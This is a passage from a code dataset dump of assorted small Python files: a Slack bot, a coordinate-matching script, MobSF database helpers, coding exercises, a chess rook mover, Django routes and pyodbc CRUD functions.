len(test_loader.dataset)\n accuracy = 100.0 * correct / len(test_loader.dataset)\n\n logger.debug(\n \"Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n\".format(\n test_loss, correct, len(test_loader.dataset), accuracy\n )\n )\n\n return accuracy\n\n\ndef model_fn(model_dir):\n model = torch.nn.DataParallel(Net())\n with open(os.path.join(model_dir, \"model.pth\"), \"rb\") as f:\n model.load_state_dict(torch.load(f))\n return model\n\n\ndef save_model(model, model_dir):\n logger.info(\"Saving the model.\")\n path = os.path.join(model_dir, \"model.pth\")\n # recommended way from http://pytorch.org/docs/master/notes/serialization.html\n torch.save(model.state_dict(), path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epochs\", type=int, default=1, metavar=\"N\")\n parser.add_argument(\"--batch-size\", type=int, default=64, metavar=\"N\")\n\n # Container environment\n parser.add_argument(\"--hosts\", type=list, default=json.loads(os.environ[\"SM_HOSTS\"]))\n parser.add_argument(\"--current-host\", type=str, default=os.environ[\"SM_CURRENT_HOST\"])\n parser.add_argument(\"--model-dir\", type=str, default=os.environ[\"SM_MODEL_DIR\"])\n parser.add_argument(\"--data-dir\", type=str, default=os.environ[\"SM_CHANNEL_TRAINING\"])\n parser.add_argument(\"--num-gpus\", type=int, default=os.environ[\"SM_NUM_GPUS\"])\n parser.add_argument(\"--num-cpus\", type=int, default=os.environ[\"SM_NUM_CPUS\"])\n\n train(parser.parse_args())\n","sub_path":"tests/data/pytorch_mnist/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95255377","text":"import os\nimport time\nimport re\nfrom slackclient import SlackClient\nimport logging\nfrom dotenv import load_dotenv\n\n# load .env variables\nload_dotenv()\n\n# sets default logging\nlogging.basicConfig()\n\n# instantiate Slack client\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\n# starterbot's user ID in Slack: value is assigned after the bot starts up\nstarterbot_id = None\n\n# constants\nRTM_READ_DELAY = 0.5 # 1 second delay between reading from RTM\nEXAMPLE_COMMAND = \"do\"\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\n\nglobal_var = {\n \"hello\": 0\n}\n\n\ndef parse_bot_commands(slack_events):\n \"\"\"\n Parses a list of events coming from the Slack RTM API to find bot commands.\n If a bot command is found, this function returns a tuple of\n command and channel.\n If its not found, then this function returns None, None.\n \"\"\"\n for event in slack_events:\n if event[\"type\"] == \"message\" and \"subtype\" not in event:\n if event[\"text\"] == \"register\":\n user_id = event[\"user\"]\n # check if global_var contains the user\n if user_id in global_var:\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"You are already registered\"\n )\n # register the user\n else:\n global_var[user_id] = {\n \"money\": 100,\n }\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"OK. I registered you.\"\n )\n elif event[\"text\"] == \"play\":\n user_id = event[\"user\"]\n if user_id not in global_var:\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"You are not registered\"\n )\n else:\n global_var[user_id][\"money\"] -= 10\n\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"A :spades: J :heart: BlackJack! 
You Win!\"\n )\n global_var[user_id][\"money\"] += 20\n\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"You now have %s dollars\" % global_var[user_id][\"money\"]\n )\n elif event[\"text\"] == \"test me\":\n global_var[\"hello\"] = global_var[\"hello\"] + 1\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"test % s\" % global_var[\"hello\"]\n )\n\n user_id, message = parse_direct_mention(event[\"text\"])\n if user_id == starterbot_id:\n return message, event[\"channel\"]\n return None, None\n\n\ndef parse_direct_mention(message_text):\n \"\"\"\n Finds a direct mention (a mention that is at the beginning) in message text\n and returns the user ID which was mentioned. If there is no direct mention\n returns None\n \"\"\"\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, \n # the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)\n\n\ndef handle_command(command, channel):\n \"\"\"\n Executes bot command if the command is known\n \"\"\"\n # Default response is help text for the user\n default_response = \"Not sure what you mean. Try *{}*.\".format(EXAMPLE_COMMAND)\n\n # Finds and executes the given command, filling in response\n response = None\n # This is where you start to implement more commands!\n if command.startswith(EXAMPLE_COMMAND):\n response = \"Sure...write some more code then I can do that!\"\n\n # Sends the response back to the channel\n slack_client.api_call(\n \"chat.postMessage\",\n channel=channel,\n text=response or default_response\n )\n\n\nif __name__ == \"__main__\":\n if slack_client.rtm_connect(with_team_state=False):\n print(\"Starter Bot connected and running!\")\n # Read bot's user ID by calling Web API method `auth.test`\n starterbot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\n while True:\n command, channel = parse_bot_commands(slack_client.rtm_read())\n if command:\n handle_command(command, channel)\n time.sleep(RTM_READ_DELAY)\n else:\n print(\"Connection failed. 
Exception traceback printed above.\")\n","sub_path":"starterbot.py","file_name":"starterbot.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"272367623","text":"import csv\nimport math\nimport time\n\n\n# pi - the number pi, rad - radius of the sphere (the Earth), in meters\nrad = 6372795\ninput_filename_effes = 'UA_poc_effes.csv'\ninput_filename_inbev = 'UA_pocs_SW.csv'\noutput_filename = 'pocs_matching_inbev-effes2.csv'\ndistance_limit = 100\nTIMEOUT = 0\n\n\ndef csv_read(filename):\n    with open(filename, 'r', encoding=\"utf-8\") as fp:\n        reader = csv.reader(fp, delimiter=',', quotechar=\"'\")\n        data_read = [row for row in reader]\n    return data_read\n\n\ndef dist(p1, p2):\n    # coordinates of the two points\n    llat1 = float(p1[1])\n    llong1 = float(p1[2])\n\n    llat2 = float(p2[1])\n    llong2 = float(p2[2])\n\n    # in radians\n    lat1 = llat1 * math.pi / 180.\n    lat2 = llat2 * math.pi / 180.\n    long1 = llong1 * math.pi / 180.\n    long2 = llong2 * math.pi / 180.\n\n    # cosines and sines of the latitudes and of the longitude difference\n    cl1 = math.cos(lat1)\n    cl2 = math.cos(lat2)\n    sl1 = math.sin(lat1)\n    sl2 = math.sin(lat2)\n    delta = long2 - long1\n    cdelta = math.cos(delta)\n    sdelta = math.sin(delta)\n\n    # great-circle distance calculation\n    y = math.sqrt(math.pow(cl2 * sdelta, 2) + math.pow(cl1 * sl2 - sl1 * cl2 * cdelta, 2))\n    x = sl1 * sl2 + cl1 * cl2 * cdelta\n    ad = math.atan2(y, x)\n    dist = ad * rad\n    return dist\n\n\ndef match(all_inbev, all_effes):\n    result = []\n    count = 0\n    for effes in all_effes:\n\n        for inbev in all_inbev:\n            res = []\n            try:\n                distance = dist(inbev, effes)\n            except ValueError:\n                continue\n            if distance > 0 and distance <= distance_limit:\n                res.append(effes[0])\n                res.append(inbev[0])\n                res.append(distance)\n                result.append(res)\n                print('iteration - {} matches - {} distance - {}'.format(count, len(result), distance))\n\n        time.sleep(TIMEOUT)\n\n        count += 1\n    return result\n\n\ndef write_file(text):\n    with open(output_filename, \"w\", newline=\"\", encoding=\"utf-8\", ) as file:\n        writer = csv.writer(file)\n        # writer.writerows([['id', 'Ol_id_inbev','distance'], ])\n        writer.writerows(text)\n    return None\n\n\nall_inbev = csv_read(input_filename_inbev)[1:]\nall_effes = csv_read(input_filename_effes)[1:]\n# after_mach = match(all_inbev, all_effes)\nwrite_file(match(all_inbev, all_effes))\n","sub_path":"matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"209112051","text":"# -*- coding: utf_8 -*-\r\nimport logging\r\n\r\nimport settings\r\nfrom django.db.models import QuerySet\r\nfrom utils import python_dict, python_list\r\nfrom StaticAnalyzer.models import StaticAnalyzerAndroid\r\n\r\n\"\"\"Module holding the functions for the db.\"\"\"\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef get_context_from_db_entry(db_entry: QuerySet) -> dict:\r\n    \"\"\"Return the context for APK/ZIP from DB.\"\"\"\r\n    try:\r\n        logger.info('Analysis is already Done. 
Fetching data from the DB...')\r\n context = {\r\n 'version': settings.MOBSF_VER,\r\n 'title': 'Static Analysis',\r\n 'file_name': db_entry[0].FILE_NAME,\r\n 'app_name': db_entry[0].APP_NAME,\r\n 'app_type': db_entry[0].APP_TYPE,\r\n 'size': db_entry[0].SIZE,\r\n 'md5': db_entry[0].MD5,\r\n 'sha1': db_entry[0].SHA1,\r\n 'sha256': db_entry[0].SHA256,\r\n 'package_name': db_entry[0].PACKAGE_NAME,\r\n 'main_activity': db_entry[0].MAIN_ACTIVITY,\r\n 'exported_activities': db_entry[0].EXPORTED_ACTIVITIES,\r\n 'browsable_activities': python_dict(db_entry[0].BROWSABLE_ACTIVITIES),\r\n 'activities': python_list(db_entry[0].ACTIVITIES),\r\n 'receivers': python_list(db_entry[0].RECEIVERS),\r\n 'providers': python_list(db_entry[0].PROVIDERS),\r\n 'services': python_list(db_entry[0].SERVICES),\r\n 'libraries': python_list(db_entry[0].LIBRARIES),\r\n 'target_sdk': db_entry[0].TARGET_SDK,\r\n 'max_sdk': db_entry[0].MAX_SDK,\r\n 'min_sdk': db_entry[0].MIN_SDK,\r\n 'version_name': db_entry[0].VERSION_NAME,\r\n 'version_code': db_entry[0].VERSION_CODE,\r\n 'icon_hidden': db_entry[0].ICON_HIDDEN,\r\n 'icon_found': db_entry[0].ICON_FOUND,\r\n 'permissions': python_dict(db_entry[0].PERMISSIONS),\r\n 'certificate_analysis': python_dict(db_entry[0].CERTIFICATE_ANALYSIS),\r\n 'manifest_analysis': python_list(db_entry[0].MANIFEST_ANALYSIS),\r\n 'network_security': python_list(db_entry[0].NETWORK_SECURITY),\r\n 'binary_analysis': python_list(db_entry[0].BINARY_ANALYSIS),\r\n 'file_analysis': python_list(db_entry[0].FILE_ANALYSIS),\r\n 'android_api': python_dict(db_entry[0].ANDROID_API),\r\n 'code_analysis': python_dict(db_entry[0].CODE_ANALYSIS),\r\n 'niap_analysis': python_dict(db_entry[0].NIAP_ANALYSIS),\r\n 'urls': python_list(db_entry[0].URLS),\r\n 'domains': python_dict(db_entry[0].DOMAINS),\r\n 'emails': python_list(db_entry[0].EMAILS),\r\n 'strings': python_list(db_entry[0].STRINGS),\r\n 'firebase_urls': python_list(db_entry[0].FIREBASE_URLS),\r\n 'files': python_list(db_entry[0].FILES),\r\n 'exported_count': python_dict(db_entry[0].EXPORTED_COUNT),\r\n 'apkid': python_dict(db_entry[0].APKID),\r\n 'trackers': python_dict(db_entry[0].TRACKERS),\r\n 'secrets': python_list(db_entry[0].SECRETS),\r\n }\r\n return context\r\n except Exception:\r\n logger.exception('Fetching from DB')\r\n\r\n\r\ndef get_context_from_analysis(app_dic,\r\n man_data_dic,\r\n man_an_dic,\r\n code_an_dic,\r\n cert_dic,\r\n bin_anal,\r\n apk_id,\r\n trackers) -> dict:\r\n \"\"\"Get the context for APK/ZIP from analysis results.\"\"\"\r\n try:\r\n context = {\r\n 'title': 'Static Analysis',\r\n 'version': settings.MOBSF_VER,\r\n 'file_name': app_dic['app_name'],\r\n 'app_name': app_dic['real_name'],\r\n 'app_type': app_dic['zipped'],\r\n 'size': app_dic['size'],\r\n 'md5': app_dic['md5'],\r\n 'sha1': app_dic['sha1'],\r\n 'sha256': app_dic['sha256'],\r\n 'package_name': man_data_dic['packagename'],\r\n 'main_activity': man_data_dic['mainactivity'],\r\n 'exported_activities': man_an_dic['exported_act'],\r\n 'browsable_activities': python_dict(man_an_dic['browsable_activities']),\r\n 'activities': python_list(man_data_dic['activities']),\r\n 'receivers': python_list(man_data_dic['receivers']),\r\n 'providers': python_list(man_data_dic['providers']),\r\n 'services': python_list(man_data_dic['services']),\r\n 'libraries': python_list(man_data_dic['libraries']),\r\n 'target_sdk': man_data_dic['target_sdk'],\r\n 'max_sdk': man_data_dic['max_sdk'],\r\n 'min_sdk': man_data_dic['min_sdk'],\r\n 'version_name': man_data_dic['androvername'],\r\n 
'version_code': man_data_dic['androver'],\r\n 'icon_hidden': app_dic['icon_hidden'],\r\n 'icon_found': app_dic['icon_found'],\r\n 'permissions': python_dict(man_an_dic['permissons']),\r\n 'certificate_analysis': python_dict(cert_dic),\r\n 'manifest_analysis': python_list(man_an_dic['manifest_anal']),\r\n 'network_security': python_list(man_an_dic['network_security']),\r\n 'binary_analysis': python_list(bin_anal),\r\n 'file_analysis': python_list(app_dic['certz']),\r\n 'android_api': python_dict(code_an_dic['api']),\r\n 'code_analysis': python_dict(code_an_dic['findings']),\r\n 'niap_analysis': python_dict(code_an_dic['niap']),\r\n 'urls': python_list(code_an_dic['urls']),\r\n 'domains': python_dict(code_an_dic['domains']),\r\n 'emails': python_list(code_an_dic['emails']),\r\n 'strings': python_list(app_dic['strings']),\r\n 'firebase_urls': python_list(code_an_dic['firebase']),\r\n 'files': python_list(app_dic['files']),\r\n 'exported_count': python_dict(man_an_dic['exported_cnt']),\r\n 'apkid': python_dict(apk_id),\r\n 'trackers': python_dict(trackers),\r\n 'secrets': python_list(app_dic['secrets']),\r\n }\r\n return context\r\n except Exception:\r\n logger.exception('Rendering to Template')\r\n\r\n\r\ndef save_or_update(update_type,\r\n app_dic,\r\n man_data_dic,\r\n man_an_dic,\r\n code_an_dic,\r\n cert_dic,\r\n bin_anal,\r\n apk_id,\r\n trackers) -> None:\r\n \"\"\"Save/Update an APK/ZIP DB entry.\"\"\"\r\n try:\r\n values = {\r\n 'FILE_NAME': app_dic['app_name'],\r\n 'APP_NAME': app_dic['real_name'],\r\n 'APP_TYPE': app_dic['zipped'],\r\n 'SIZE': app_dic['size'],\r\n 'MD5': app_dic['md5'],\r\n 'SHA1': app_dic['sha1'],\r\n 'SHA256': app_dic['sha256'],\r\n 'PACKAGE_NAME': man_data_dic['packagename'],\r\n 'MAIN_ACTIVITY': man_data_dic['mainactivity'],\r\n 'EXPORTED_ACTIVITIES': man_an_dic['exported_act'],\r\n 'BROWSABLE_ACTIVITIES': man_an_dic['browsable_activities'],\r\n 'ACTIVITIES': man_data_dic['activities'],\r\n 'RECEIVERS': man_data_dic['receivers'],\r\n 'PROVIDERS': man_data_dic['providers'],\r\n 'SERVICES': man_data_dic['services'],\r\n 'LIBRARIES': man_data_dic['libraries'],\r\n 'TARGET_SDK': man_data_dic['target_sdk'],\r\n 'MAX_SDK': man_data_dic['max_sdk'],\r\n 'MIN_SDK': man_data_dic['min_sdk'],\r\n 'VERSION_NAME': man_data_dic['androvername'],\r\n 'VERSION_CODE': man_data_dic['androver'],\r\n 'ICON_HIDDEN': app_dic['icon_hidden'],\r\n 'ICON_FOUND': app_dic['icon_found'],\r\n 'CERTIFICATE_ANALYSIS': cert_dic,\r\n 'PERMISSIONS': man_an_dic['permissons'],\r\n 'MANIFEST_ANALYSIS': man_an_dic['manifest_anal'],\r\n 'BINARY_ANALYSIS': bin_anal,\r\n 'FILE_ANALYSIS': app_dic['certz'],\r\n 'ANDROID_API': code_an_dic['api'],\r\n 'CODE_ANALYSIS': code_an_dic['findings'],\r\n 'NIAP_ANALYSIS': code_an_dic['niap'],\r\n 'URLS': code_an_dic['urls'],\r\n 'DOMAINS': code_an_dic['domains'],\r\n 'EMAILS': code_an_dic['emails'],\r\n 'STRINGS': app_dic['strings'],\r\n 'FIREBASE_URLS': code_an_dic['firebase'],\r\n 'FILES': app_dic['files'],\r\n 'EXPORTED_COUNT': man_an_dic['exported_cnt'],\r\n 'APKID': apk_id,\r\n 'TRACKERS': trackers,\r\n 'NETWORK_SECURITY': man_an_dic['network_security'],\r\n 'SECRETS': app_dic['secrets'],\r\n }\r\n if update_type == 'save':\r\n db_entry = StaticAnalyzerAndroid.objects.filter(\r\n MD5=app_dic['md5'])\r\n if not db_entry.exists():\r\n StaticAnalyzerAndroid.objects.create(**values)\r\n else:\r\n StaticAnalyzerAndroid.objects.filter(\r\n MD5=app_dic['md5']).update(**values)\r\n except Exception:\r\n logger.exception('Updating 
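save_or_update() above emulates an upsert with a filter()/exists()/create()/update() sequence keyed on MD5. Django's built-in update_or_create() expresses the same operation in one call; a hedged sketch, assuming the same StaticAnalyzerAndroid model and the values dict built above:

from StaticAnalyzer.models import StaticAnalyzerAndroid

def upsert_scan(md5, values):
    # MD5 is the lookup key; `defaults` are applied on create and on update.
    obj, created = StaticAnalyzerAndroid.objects.update_or_create(
        MD5=md5,
        defaults=values,
    )
    return obj, created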
DB')\r\n","sub_path":"StaticAnalyzer/db_interaction.py","file_name":"db_interaction.py","file_ext":"py","file_size_in_byte":10020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"23011095","text":"import argparse\nimport gzip\n\nparser = argparse.ArgumentParser(description=\"\"\"Reads and prints a text file\"\"\")\nparser.add_argument(\"filename\", type=str, help=\"The file name\")\nparser.add_argument(\"-z\", \"--gzipped\", action=\"store_true\", help=\"If set, input file is assumed gzipped\")\n\nargs = parser.parse_args()\ninputFile = args.filename\nfh = \"\"\nif(args.gzipped):\n fh = gzip.open(inputFile, \"rt\")\nelse:\n fh = open(inputFile, \"r\")\n\nfor line in fh:\n line = line.strip(\"\\n\")\n print(line)\n\nfh.close()\n","sub_path":"exercises/readFile_gz.py","file_name":"readFile_gz.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"475393038","text":"\"\"\"Дополнительные задания\"\"\"\nfrom multiprocessing import Queue\nfrom Matrix import Matrix\nfrom random import randint\nfrom multiprocessing import Process\nfrom time import sleep\n\n\ndef creating(q):\n while True:\n size = randint(2, 7)\n a = Matrix(a=size, b=size, random=True)\n b = Matrix(a=size, b=size, random=True)\n print(f\"Сгенерированы матрицы:\\n{a}\\n{b}\\n--------------------------\")\n q.put([a, b])\n sleep(8) # Эта функция выполняется намного быстрее умножения, поэтому ждём\n\n\ndef reading(q):\n while True:\n Matrix = q.get()\n MultMatrix = Matrix[0] * Matrix[1]\n print(\n f\"Умножены матрицы: {Matrix[0]} и {Matrix[1]},\\nРезультат: {MultMatrix}\\n-------------------------------\")\n\n\nif __name__ == \"__main__\":\n q = Queue()\n creating_proc = Process(target=creating, args=[q])\n mult_proc = Process(target=reading, args=[q])\n creating_proc.start()\n mult_proc.start()\n","sub_path":"additional_tasks.py","file_name":"additional_tasks.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"21697315","text":"# -- coding = 'utf-8' -- \n# Author Kylin\n# Python Version 3.7.3\n# OS macOS\n\"\"\"\nNo.1100 长度为K的无重复字符子串\n需求:\n 给你一个字符串S,找出所有长度为K且不含重复字符的子串,请你返回全部满足要求的子串的数目。\n注意:\n S中的所有字符均为小写英文字母\n\"\"\"\n\n\ndef numKLenSubstrNoRepeats(s, k):\n \"\"\"\n 滑动窗口\n 时间复杂度:O(n),n为s的长度\n 空间复杂度:O(|s|),s的字符集个数,用于记录字符出现情况\n :type s: str\n :type k: int\n :rtype: int\n \"\"\"\n n = len(s)\n count = 0\n window = dict()\n left, right = 0, 0\n\n while right < n:\n # 加入当前元素\n ch = s[right]\n if ch in window:\n window[ch] += 1\n else:\n window[ch] = 1\n\n # 到达窗口长度\n if right - left + 1 == k:\n if len(window) == k:\n # 如果元素均不相同,则记录\n count += 1\n # 缩小窗口\n left_ch = s[left]\n window[left_ch] -= 1\n if window[left_ch] == 0:\n del window[left_ch]\n left += 1\n right += 1\n\n return count\n\n\nif __name__ == \"__main__\":\n S = \"havefunonleetcode\"\n K = 5\n count = numKLenSubstrNoRepeats(S, K)\n print(count)","sub_path":"LeetCode/src/search07/num_Klen_substring.py","file_name":"num_Klen_substring.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157451105","text":"def insertion(N, M, j, i):\n\tprint(N,M,j,i)\n\tmask = -1 << j\n\tmask = ~mask\n\tmask >>= i\n\tmask = ~mask\n\tM <<= i\n\tN &= mask\n\tN |= M\n\treturn N\n\t\n\n\ndef runTests():\n\tN = int('10000000000', 2)\n\tM = int('10011', 2)\n\ti, j 
= 2,6\n\tprint(insertion(N,M,j,i) == int('10001001100', 2))\n\nrunTests()","sub_path":"CTCI/Chapter_5/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535295405","text":"from collections import namedtuple\n\n\nPins = namedtuple('Pins', ['sr', 'sg', 'f', 'b', 'l', 'r'])\n\n\nclass Translator:\n def __init__(self, output):\n self.pins = Pins(*output.setup(*Pins._fields))\n\n self._status_outputs = {\n 'activity': ('pulse', (1, self.pins.sg)),\n 'ready': ('on', (self.pins.sr,)),\n 'startup': ('flash', (self.pins.sr,)),\n 'error': ('flash', (self.pins.sr, self.pins.sg))\n }\n\n def do(self, action):\n if action.type == 'status':\n return self._status_outputs[action.status]\n elif action.type == 'go':\n return 'on', (self._pinfor(action.direction),)\n elif action.type == 'stop':\n return 'off', (self._pinfor(action.direction),)\n elif action.type == 'halt':\n return 'halt', action.level\n\n def _pinfor(self, direction):\n if direction == 'forward':\n return self.pins.f\n elif direction == 'backward':\n return self.pins.b\n elif direction == 'turn_left':\n return self.pins.l\n elif direction == 'turn_right':\n return self.pins.r\n\n\ntranslator_class = Translator\n","sub_path":"controller/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242359913","text":"# Download the Python helper library from twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\n\n# Your Account Sid and Auth Token from twilio.com/user/account\n# To set up environmental variables, see http://twil.io/secure\naccount = os.environ['TWILIO_ACCOUNT_SID']\ntoken = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account, token)\n\nuser = client.chat \\\n .services(\"ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\") \\\n .users(\"USXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\") \\\n .fetch()\n\nprint(user.identity)\n","sub_path":"ip-messaging/rest/users/retrieve-user/retrieve-user.6.x.py","file_name":"retrieve-user.6.x.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363192469","text":"from django.urls import path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .views import *\n\napp_name = 'dashboard'\n\nurlpatterns = [\n path('', index, name='index'),\n\n path('add/category/', add_category, name='add_category'),\n path('edit/category//', edit_category, name='edit_category'),\n path('delete/category//', delete_category, name=\"delete_category\"),\n\n path('add/sub/category/', add_sub_category, name='add_sub_category'),\n path('edit/sub/category//',\n edit_sub_category, name='edit_sub_category'),\n path('delete/sub/category//',\n delete_sub_category, name=\"delete_sub_category\"),\n\n path('products/', products, name='products'),\n path('edit/products//', edit_product, name='edit_product'),\n path('delete/product//', delete_product, name='delete_product'),\n\n\n path('banner/', banner, name='banner'),\n path('edit/banner//', edit_banner, name='edit_banner'),\n path('delete/banner//', delete_banner, name='delete_banner'),\n\n path('blogs/', blogs, name='blogs'),\n path('edit/blog//', edit_blog, name='edit_blog'),\n path('delete/blog//', delete_blog, name='delete_blog'),\n\n path('brands/', brands, name='brands'),\n 
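The mask in insertion.py above zeroes the low j-i bits of N instead of bits i..j, so its single test passes only because N happens to be zero there. A corrected sketch of the standard clear-then-insert mask (note the original's parameter order is insertion(N, M, j, i); the sketch uses (n, m, i, j) for clarity):

def insert_bits(n, m, i, j):
    left = ~0 << (j + 1)          # ones above bit j
    right = (1 << i) - 1          # ones below bit i
    mask = left | right           # zeros exactly at positions i..j
    return (n & mask) | (m << i)  # clear the slot, then OR in M shifted up

assert insert_bits(0b10000000000, 0b10011, 2, 6) == 0b10001001100
# A case the original mask gets wrong: N has nonzero bits below i.
assert insert_bits(0b10000001111, 0b10011, 2, 6) == 0b10001001111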
path('delete/brands//', delete_brands, name='delete_brands'),\n\n path('orders/', orders, name='orders'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391942301","text":"from ressources.vide import vide\nfrom ressources.board import boardCoord, pieceBlanc, pieceNoir\nfrom ressources.boardlimit import boardlimit\n\n\ndef tour(boardCoord, ligne, colonne, couleur):\n legalmoves = []\n if couleur == \"n\":\n color = pieceBlanc\n else:\n color = pieceNoir\n postour = [ligne, colonne]\n deplacement = [[1, 0], [0, 1], [-1, 0], [0, -1]]\n for possibilite in deplacement:\n i = 1\n while True:\n row = postour[0] + i * possibilite[0]\n column = postour[1] + i * possibilite[1]\n if boardlimit(row, column) and vide(boardCoord, row, column):\n legalmoves.append([row, column])\n i += 1\n else:\n if boardlimit(row, column) and boardCoord[row][column] in color:\n legalmoves.append([row, column])\n break\n return legalmoves\n","sub_path":"pieces/tour.py","file_name":"tour.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414718291","text":"# Decode Ways\n\n# A message containing letters from A-Z is being encoded to numbers using the following mapping:\n# \n# 'A' -> 1\n# 'B' -> 2\n# ...\n# 'Z' -> 26\n# Given an encoded message containing digits, determine the total number of ways to decode it.\n# \n# For example,\n# Given encoded message \"12\", it could be decoded as \"AB\" (1 2) or \"L\" (12).\n# \n# The number of ways decoding \"12\" is 2\n\n\n# Solution:\n# It's a recursively defined problem.\n# Decode(s) = IsValid(s[0]) * Decode(s[1:]) + IsValid(s[:2]) * Decode(s[2:])\n# Just be aware of all those special cases. The input could be invalid, therefore should output 0. \n\n# Test Cases:\n# s = Solution()\n# print(5 == s.numDecodings('1223'))\n# print(1 == s.numDecodings('10'))\n# print(0 == s.numDecodings('100'))\n# print(2 == s.numDecodings('12'))\n# print(0 == s.numDecodings('909'))\n\nclass Solution:\n # @param {string} s\n # @return {integer}\n def numDecodings(self, s):\n def is_valid(num):\n # Bug: Simply check int(num) in this funciton will miss bad case like '09'\n if len(num) == 1:\n return 1 if int(num) > 0 else 0 # Bug: input could be '0', which is invalid\n if len(num) == 2:\n return 1 if int(num) > 9 and int(num) < 27 else 0 \n # Bug: Need to handle empty input\n if s == '':\n return 0\n result = [0 for _ in range(len(s)+1)]\n result[-1] = 1 # Bug: Need to set this placeholde to 1\n if s[-1] != '0':\n result[-2] = 1\n for i in reversed(range(len(s)-1)): \n result[i] = is_valid(s[i]) * result[i+1] + is_valid(s[i:i+2])* result[i+2]\n return result[0]\n \n","sub_path":"091_DecodeWays/decode_ways.py","file_name":"decode_ways.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"298079269","text":"# 배열, 최대 최소\n# N개의 정수가 주어진다. 이때, 최솟값과 최댓값을 구하는 프로그램을 작성하시오.\n# 첫째 줄에 정수의 개수 N (1 ≤ N ≤ 1,000,000)이 주어진다. 둘째 줄에는 N개의 정수를 공백으로 구분해서 주어진다. 
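decode_ways.py above fills its DP table bottom-up from the suffix. An equivalent top-down memoised view of the same recurrence Decode(s) = IsValid(s[0]) * Decode(s[1:]) + IsValid(s[:2]) * Decode(s[2:]), which can be easier to check case by case:

from functools import lru_cache

def num_decodings(s: str) -> int:
    @lru_cache(maxsize=None)
    def ways(i: int) -> int:
        if i == len(s):
            return 1                 # empty suffix decodes exactly one way
        if s[i] == '0':
            return 0                 # no letter encoding starts with 0
        total = ways(i + 1)          # consume one digit (1-9)
        if i + 1 < len(s) and 10 <= int(s[i:i + 2]) <= 26:
            total += ways(i + 2)     # consume two digits (10-26)
        return total
    return ways(0) if s else 0

assert num_decodings('1223') == 5 and num_decodings('100') == 0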
\n# 모든 정수는 -1,000,000보다 크거나 같고, 1,000,000보다 작거나 같은 정수이다.\n# 첫째 줄에 주어진 정수 N개의 최솟값과 최댓값을 공백으로 구분해 출력한다.\n# 입력\n# 5 \n# 20 10 35 30 7\n\n# 출력\n# 7 35\n\n\nn = int(input())\nn_list = list(map(int, input().split()))\n\nif len(n_list) > n:\n print(\"error\")\nelse:\n print(min(n_list),max(n_list))\n\n\n","sub_path":"arr/test_10818_arr.py","file_name":"test_10818_arr.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"504386678","text":"import pyodbc\ndef Select2(conexion):\n print(\"mostrando datos2\")\n cur=conexion.cursor()\n cur.execute(\"select * from dimusers\")\n result= cur.fetchmany(3)\n print(result)\n \ndef Select(conexion):\n print(\"mostrando datos\")\n cur=conexion.cursor()\n cur.execute(\"select * from dimusers\")\n for fila in cur:\n print(fila)\n \ndef Insert(conexion):\n print(\"insert\")\n cur=conexion.cursor()\n cur.execute(\"insert into dimusers values ('BTO\\\\Alberto')\")\n cur.commit()\n Select(conexion)\n \ndef Update(conexion):\n print(\"actulizando\")\n cur=conexion.cursor()\n cur.execute(\"update dimusers set account = 'BTO\\\\Anibal' where accountid = 1007\")\n cur.commit()\n 